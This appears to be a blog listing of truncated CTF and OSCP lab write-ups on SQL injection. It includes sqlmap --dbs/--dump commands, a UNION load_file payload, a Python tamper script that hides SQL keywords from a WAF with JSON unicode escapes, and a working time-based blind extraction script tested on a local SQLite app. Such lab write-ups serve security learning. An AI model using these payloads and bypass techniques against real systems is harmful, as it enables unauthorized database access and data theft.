Posts

OSCP Capstone Lab Writeup - SQLi Module - Save Animals

Take a look. With anticipation, I opened the website, which only had index.php, about.php, and donate.php pages. Frustration set in as I couldn't find any input fields to interact with. AutoRecon scan (can be ignored). I then ran AutoRecon to see whether there were more hidden files or vulnerabilities; it only found dbconn.php, which was a blank page. Source code checking. Determined, I delved into the source code and searched for 'post'. My excitement grew when I discovered that 'mail-list' was a parameter in a subscribe form. Burp Suite intercept. I quickly opened Burp Suite, set up the proxy, and intercepted the subscribe form submission. SQL injection. With precision, I copied the intercepted request and saved it as post.txt.

OSCP Capstone Lab Writeup - SQLi Module - Alvida-Eatery

Take a look. Website content analysis: accessed the website (http://192.168.139.47:80). It displays bakery goods and coffee products, static content only, with no interactive elements: no search functionality, no login forms, no input fields. Initial assessment: limited attack surface due to the lack of user input fields; traditional injection techniques are not immediately applicable; alternative entry points need to be explored. Further website exploration: located and clicked the alvida-eatery.org link within the main website, http://www6.alvida-eatery.org/lander?template=ARROW_3&tdfs=0&s_token=1731789108.0467710000&uuid=1731789108.0467710000&term=Caterer%20Menu&term=Lunch%20Catering&term=Restaurant%20Table%20Reservations%20Online&searchbox=0&showDomain=0&backfill=0. Attempted an SQLMap injection on the URL parameters, targeting the 'uuid' parameter; result: a 403 Forbidden error was received. Initial attack attempts: Hint analysis: Hin...

wafwaf -- Hack The Box -- Web SQL injection

0x00 Problem. 0x01 Check the source code. We open the website and only see the source code on the page. As we can see, there is a WAF that filters some characters and words, which means a normal injection will not work. However, there is a json_decode() function that decodes JSON data, so the data we send must be in JSON format. JSON-escaped data looks like \u0074, \u0075 (the escapes for 't' and 'u'). In addition, there is a php://input, which is the read-only stream of the raw request body: the POST body is read as raw bytes rather than as form fields, and that is what json_decode() parses. The important consequence is that the WAF inspects the raw body, while the escapes are only resolved afterwards by json_decode(). 0x02 Local test. We can launch an Apache server to test it. I copied the source code and made a small change to test this. This file is in /var/www/html. We construct the data first. This time I use 'select' as an example. Each character is converted to its ASCII code, then to hex, and the '0x' prefix is replaced with '\u00'. This can be tested in the browser console. Finally, we test it with curl. As we can see, the SQL...
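The encoding step above, as an added example that is not the challenge's or the author's code: blocked SQL keywords are rewritten as JSON \u escapes so a keyword-matching WAF never sees them in the raw body, while json_decode() on the server restores them. It is written in the shape of a sqlmap tamper script (a tamper(payload, **kwargs) entry point) so the same trick can later be handed to sqlmap. The blocklist, the JSON field name q, and the sample payload are assumptions made for this illustration; the challenge's real filter list is not reproduced.

```python
import json
import re

# Keyword list this example ASSUMES the WAF blocks (the challenge's real list
# is not reproduced). Longest tokens first so the regex prefers "select" over
# the shorter "or"-style tokens when both could match at one position.
BLOCKED = sorted(["select", "union", "from", "where", "sleep", "and", "or", "'"],
                 key=len, reverse=True)
_BLOCKED_RE = re.compile("|".join(re.escape(t) for t in BLOCKED), re.IGNORECASE)
# The tamper also escapes the two characters that would break the JSON string.
_TAMPER_RE = re.compile("|".join(re.escape(t) for t in BLOCKED + ['"', "\\"]),
                        re.IGNORECASE)


def json_unicode_escape(text: str) -> str:
    """Write every character of text as a JSON \\uXXXX escape.

    Same steps as the post: character -> code point -> hex -> '\\u00' + hex.
    """
    return "".join("\\u{:04x}".format(ord(ch)) for ch in text)


def tamper(payload: str, **kwargs) -> str:
    """Entry point in the shape sqlmap expects from a tamper script.

    Only blocked tokens (and JSON-special characters) are escaped; the rest of
    the payload stays readable. A real tamper script would also declare
    __priority__ from lib.core.enums.PRIORITY; omitted so this runs stand-alone.
    """
    if not payload:
        return payload
    return _TAMPER_RE.sub(lambda m: json_unicode_escape(m.group(0)), payload)


def waf_blocks(raw_body: str) -> bool:
    """Toy model of the WAF: a plain keyword match on the raw request body."""
    return _BLOCKED_RE.search(raw_body) is not None


def build_body(payload: str, field: str = "q") -> str:
    """Wrap the tampered payload in the JSON object the endpoint reads.
    The field name q is an assumption for this example."""
    return '{"%s": "%s"}' % (field, tamper(payload))


def server_side_decode(raw_body: str, field: str = "q") -> str:
    """Model of json_decode(file_get_contents('php://input')): the escapes are
    resolved here, after the WAF has already inspected the raw bytes."""
    return json.loads(raw_body)[field]


if __name__ == "__main__":
    payload = "1' or 1=1 union select 1,2,3-- -"      # constructed sample payload
    raw_body = '{"q": "%s"}' % payload
    tampered_body = build_body(payload)
    print("raw body blocked:     ", waf_blocks(raw_body))        # True
    print("tampered body blocked:", waf_blocks(tampered_body))   # False
    print("tampered body:        ", tampered_body)
    print("decoded on server:    ", server_side_decode(tampered_body))
```

Because only the blocked tokens are escaped, the request stays easy to read while debugging; escaping the whole value (json_unicode_escape on the full payload) works just as well against a filter of this kind, at the cost of a much longer body.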

Time-based SQLMap and Tamper scripts construct

Types of SQLMap injection techniques. Boolean-based blind: sqlmap replaces or appends to the affected parameter in the HTTP request a SQL statement and compares each response against the original page; alternatively, the user can provide a string or regular expression to match on True pages. Time-based blind: for each HTTP response, by comparing the response time with that of the original request, the tool infers the output of the injected statement character by character. Error-based: this technique works only when the web application has been configured to disclose back-end database management system error messages. UNION query-based: appends a UNION ALL SELECT to the affected parameter; it works when the page loops over the query results and displays them, so the injected row shows up in the output, e.g. http://178.62.0.100:32104/portfolio.php?id=1 union all select 1,load_file("/var/www/html/administrat/panel.php"),3-- . Stacked queries (piggybacking): appends to the affected parameter a semi-colon (;) followed by the SQL statement to be executed. Time-based blind injection: how does time-based blind injection work? The function ...
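The character-by-character inference described under "Time-based blind", as an added example that is not part of the original post and not sqlmap's code: a deliberately vulnerable handler in the style of portfolio.php?id= is stood up on an in-memory SQLite database, a SLEEP() function is registered (SQLite has none), and the client recovers a secret column purely from response times, using a binary search on each character's code point so that one character costs about seven timed requests instead of ~95 equality probes. The users table, the password value, and the delay constants are constructed for this example; MySQL would spell the condition IF(cond, SLEEP(n), 0) where SQLite needs CASE WHEN.

```python
import sqlite3
import time

SLEEP_SECONDS = 0.05            # delay the injected condition triggers when true
THRESHOLD = SLEEP_SECONDS / 2   # a response slower than this is read as "true"


def make_vulnerable_app() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the target. The users row is constructed
    sample data; SLEEP() is registered because SQLite has no native one."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cret!')")
    return conn


def portfolio(conn: sqlite3.Connection, user_id: str) -> list:
    """The vulnerable handler: the id value is concatenated straight into the
    query, which is the defect sqlmap exploits on portfolio.php?id=."""
    query = "SELECT name FROM users WHERE id = " + user_id   # no parameterisation
    return conn.execute(query).fetchall()


def is_true(conn: sqlite3.Connection, condition: str) -> bool:
    """Time-based oracle: inject 'AND CASE WHEN cond THEN SLEEP(n) ELSE 0 END'
    and decide the truth of cond from the elapsed time alone. Nothing in the
    page content is needed, which is why this works on fully blind targets."""
    payload = "1 AND CASE WHEN (%s) THEN SLEEP(%s) ELSE 0 END" % (condition, SLEEP_SECONDS)
    start = time.perf_counter()
    portfolio(conn, payload)
    return time.perf_counter() - start > THRESHOLD


def extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time.

    Position pos is first checked to exist (length >= pos); its code point is
    then found by binary search over printable ASCII with '> mid' probes.
    """
    result = ""
    for pos in range(1, max_len + 1):
        if not is_true(conn, "length((%s)) >= %d" % (subquery, pos)):
            break                      # past the end of the string
        lo, hi = 32, 126               # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if is_true(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    app = make_vulnerable_app()
    secret = extract(app, "SELECT password FROM users WHERE id = 1")
    print("recovered via timing:", secret)   # s3cret!
```

The threshold sits halfway between the normal response time and the injected delay; on a real network the baseline must be measured first and the delay chosen well above its jitter, which is exactly what sqlmap's --time-sec option tunes.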

FreeLancer - Hackthebox Write up - Web SQL injection

0x00 Problem: 0x01 Check the vulnerability. We open the website and there is a login form, so it might be vulnerable to SQL injection, LDAP injection or XSS. Then we can check the source files to find whether there is any vulnerability. Luckily we found a file named portfolio.php, and it has an id parameter. I tried to open this file with id=1 in the web browser. It returned a picture and some text. Then I changed id to other numbers, and it returned different text, so it might have an SQL injection vulnerability. 0x02 Find the database and table. Here is my command to enumerate the databases: sqlmap -u http://178.62.0.100:32104/portfolio.php?id=2 --dbs Below is the result: The first red box shows it truly has an SQL injection vulnerability and gives us the test payload which we can exploit. The second red box shows the databases we found. 0x03 Dump the data. Here is my command, choosing freelance as the target database: sqlmap -u http://178.62.0.100:32104/portfolio.php?id=2 --dump -D freela...